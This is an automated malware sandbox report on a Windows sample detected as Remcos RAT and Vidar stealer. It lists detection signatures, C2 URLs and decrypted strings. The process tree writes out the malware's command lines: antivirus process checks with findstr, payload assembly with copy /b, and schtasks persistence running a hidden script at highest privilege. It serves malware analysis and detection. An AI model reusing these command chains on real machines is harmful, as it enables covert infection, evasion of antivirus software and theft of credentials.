
Windows Analysis Report
mg9LPWGtPB.exe

Overview

General Information

Sample name: mg9LPWGtPB.exe (renamed because the original name is a hash value)
Original sample name: 5715f2100028b28f508559c4782daa5e.exe
Analysis ID: 1472119
MD5: 5715f2100028b28f508559c4782daa5e
SHA1: f15aa6ce0470b63d98406f3a4821675a2bb45732
SHA256: 3ef1d040731916fee2fe1317c53a0e363f05fd12f87b84563af86ac5d49f74c2
Tags: 32, exe, trojan

Detection

Remcos, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (suppress errors)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • mg9LPWGtPB.exe (PID: 4368 cmdline: "C:\Users\user\Desktop\mg9LPWGtPB.exe" MD5: 5715F2100028B28F508559C4782DAA5E)
    • cmd.exe (PID: 4052 cmdline: "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2128 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2604 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6380 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 180 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5324 cmdline: cmd /c md 787041 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 5256 cmdline: findstr /V "SenatorsRamAspectYounger" Boat MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5708 cmdline: cmd /c copy /b Buffalo + Sims + Imagine 787041\l MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hist.pif (PID: 4368 cmdline: 787041\Hist.pif 787041\l MD5: B06E67F9767E5023892D9698703AD098)
      • timeout.exe (PID: 6516 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • EHIJJDGDHD.exe (PID: 4752 cmdline: "C:\ProgramData\EHIJJDGDHD.exe" MD5: 384DAB1B42A5204901682D527A14752E)
      • cmd.exe (PID: 6972 cmdline: "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5452 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 516 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 4352 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 3848 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 5400 cmdline: cmd /c md 661592 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 412 cmdline: findstr /V "RECEIVEFILLMEDIAEVALUATING" Natural MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 5608 cmdline: cmd /c copy /b Saturn + Demonstrated + Preceding + Eagles + Salon + Grows + Featured 661592\h MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Bk.pif (PID: 2296 cmdline: 661592\Bk.pif 661592\h MD5: B06E67F9767E5023892D9698703AD098)
          • cmd.exe (PID: 6640 cmdline: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 6656 cmdline: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • schtasks.exe (PID: 3660 cmdline: schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 1680 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • cmd.exe (PID: 3364 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDAFIEHIEGDH" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6804 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 1100 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SolarSys.pif (PID: 3784 cmdline: "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y" MD5: B06E67F9767E5023892D9698703AD098)
  • wscript.exe (PID: 3288 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SolarSys.pif (PID: 6984 cmdline: "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y" MD5: B06E67F9767E5023892D9698703AD098)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": ["https://steamcommunity.com/profiles/76561199735694209"], "Botnet": "704b02283cd90e61ff947b4e87e7b990"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings
11.2.Hist.pif.4d20000.5.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Hist.pif.4953a50.4.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
11.2.Hist.pif.4953a50.4.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 661592\Bk.pif 661592\h, ParentImage: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, ParentProcessId: 2296, ParentProcessName: Bk.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 6640, ProcessName: cmd.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 661592\Bk.pif 661592\h, ParentImage: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, ParentProcessId: 2296, ParentProcessName: Bk.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 6640, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6640, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 6656, ProcessName: schtasks.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", ProcessId: 1100, ProcessName: wscript.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: 787041\Hist.pif 787041\l, CommandLine: 787041\Hist.pif 787041\l, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\787041\Hist.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\787041\Hist.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\787041\Hist.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4052, ParentProcessName: cmd.exe, ProcessCommandLine: 787041\Hist.pif 787041\l, ProcessId: 4368, ProcessName: Hist.pif
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 661592\Bk.pif 661592\h, ParentImage: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, ParentProcessId: 2296, ParentProcessName: Bk.pif, ProcessCommandLine: schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 3660, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\ProgramData\EHIJJDGDHD.exe" , ParentImage: C:\ProgramData\EHIJJDGDHD.exe, ParentProcessId: 4752, ParentProcessName: EHIJJDGDHD.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit, ProcessId: 6972, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6640, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 6656, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js", ProcessId: 1100, ProcessName: wscript.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4052, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 180, ProcessName: findstr.exe

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 44 BC 7A D9 BF 60 0C CC 22 CD 04 87 10 1C CE 33 25 89 CF 94 EB A8 65 9A 6F 24 FE 66 16 6A F5 A2 3E 93 E2 9E DF 83 B8 E5 F4 0D 8E 6F AF 6B 2A FA AD 16 25 8B 31 32 22 13 7A B6 88 BF 79 22 B4 DE EB 5A 3D 30 D3 2B 4D 11 D3 AB EE DF B5 27 50 B3 3E D6 85 57 05 70 FC 13 ED E2 F1 E4 64 08 DB E4 13 E1 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\661592\Bk.pif, ProcessId: 2296, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-6MRD2P\exepath
No Snort rule has matched


AV Detection

Source: https://steamcommunity.com/profiles/76561199735694209 | Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199735694209/inventory/ | Avira URL Cloud: Label: malware
Source: https://t.me/puffclou | Avira URL Cloud: Label: malware
Source: 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199735694209"], "Botnet": "704b02283cd90e61ff947b4e87e7b990"}
Source: C:\ProgramData\EHIJJDGDHD.exe | ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Windows_Services_AS[1].exe | ReversingLabs: Detection: 33%
Source: mg9LPWGtPB.exe | ReversingLabs: Detection: 15%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 95.7% probability
Source: mg9LPWGtPB.exe | Joe Sandbox ML: detected
Source: 11.2.Hist.pif.4d20000.5.unpack | String decryptor: decrypted strings, in the order reported:
  • INSERT_KEY_HERE
  • GetProcAddress
  • LoadLibraryA
  • lstrcatA
  • OpenEventA
  • CreateEventA
  • CloseHandle
  • Sleep
  • GetUserDefaultLangID
  • VirtualAllocExNuma
  • VirtualFree
  • GetSystemInfo
  • VirtualAlloc
  • HeapAlloc
  • GetComputerNameA
  • lstrcpyA
  • GetProcessHeap
  • GetCurrentProcess
  • lstrlenA
  • ExitProcess
  • GlobalMemoryStatusEx
  • GetSystemTime
  • SystemTimeToFileTime
  • advapi32.dll
  • gdi32.dll
  • user32.dll
  • crypt32.dll
  • ntdll.dll
  • GetUserNameA
  • CreateDCA
  • GetDeviceCaps
  • ReleaseDC
  • CryptStringToBinaryA
  • sscanf
  • NtQueryInformationProcess
  • VMwareVMware
  • HAL9TH
  • JohnDoe
  • DISPLAY
  • %hu/%hu/%hu
  • GetEnvironmentVariableA
  • GetFileAttributesA
  • GlobalLock
  • HeapFree
  • GetFileSize
  • GlobalSize
  • CreateToolhelp32Snapshot
  • IsWow64Process
  • Process32Next
  • GetLocalTime
  • FreeLibrary
  • GetTimeZoneInformation
  • GetSystemPowerStatus
  • GetVolumeInformationA
  • GetWindowsDirectoryA
  • Process32First
  • GetLocaleInfoA
  • GetUserDefaultLocaleName
  • GetModuleFileNameA
  • DeleteFileA
  • FindNextFileA
  • LocalFree
  • FindClose
  • SetEnvironmentVariableA
  • LocalAlloc
  • GetFileSizeEx
  • ReadFile
  • SetFilePointer
  • WriteFile
  • CreateFileA
  • FindFirstFileA
  • CopyFileA
  • VirtualProtect
  • GetLogicalProcessorInformationEx
  • GetLastError
  • lstrcpynA
  • MultiByteToWideChar
  • GlobalFree
  • WideCharToMultiByte
  • GlobalAlloc
  • OpenProcess
  • TerminateProcess
  • GetCurrentProcessId
  • gdiplus.dll
  • ole32.dll
  • bcrypt.dll
  • wininet.dll
  • shlwapi.dll
  • shell32.dll
  • psapi.dll
  • rstrtmgr.dll
  • CreateCompatibleBitmap
  • SelectObject
  • BitBlt
  • DeleteObject
  • CreateCompatibleDC
  • GdipGetImageEncodersSize
  • GdipGetImageEncoders
  • GdipCreateBitmapFromHBITMAP
  • GdiplusStartup
  • GdiplusShutdown
  • GdipSaveImageToStream
  • GdipDisposeImage
  • GdipFree
  • GetHGlobalFromStream
  • CreateStreamOnHGlobal
  • CoUninitialize
  • CoInitialize
  • CoCreateInstance
  • BCryptGenerateSymmetricKey
  • BCryptCloseAlgorithmProvider
  • BCryptDecrypt
  • BCryptSetProperty
  • BCryptDestroyKey
  • BCryptOpenAlgorithmProvider
  • GetWindowRect
  • GetDesktopWindow
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetDC
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CloseWindow
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: wsprintfA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: EnumDisplayDevicesA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetKeyboardLayoutList
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CharToOemW
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: wsprintfW
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegQueryValueExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegEnumKeyExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegOpenKeyExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegCloseKey
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegEnumValueA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CryptBinaryToStringA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CryptUnprotectData
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SHGetFolderPathA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ShellExecuteExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetOpenUrlA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetConnectA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetCloseHandle
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetOpenA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HttpSendRequestA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HttpOpenRequestA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetReadFile
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetCrackUrlA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: StrCmpCA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: StrStrA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: StrCmpCW
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PathMatchSpecA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetModuleFileNameExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RmStartSession
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RmRegisterResources
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RmGetList
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RmEndSession
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_open
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_prepare_v2
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_step
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_column_text
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_finalize
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_close
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_column_bytes
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_column_blob
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: encrypted_key
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PATH
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: C:\ProgramData\nss3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: NSS_Init
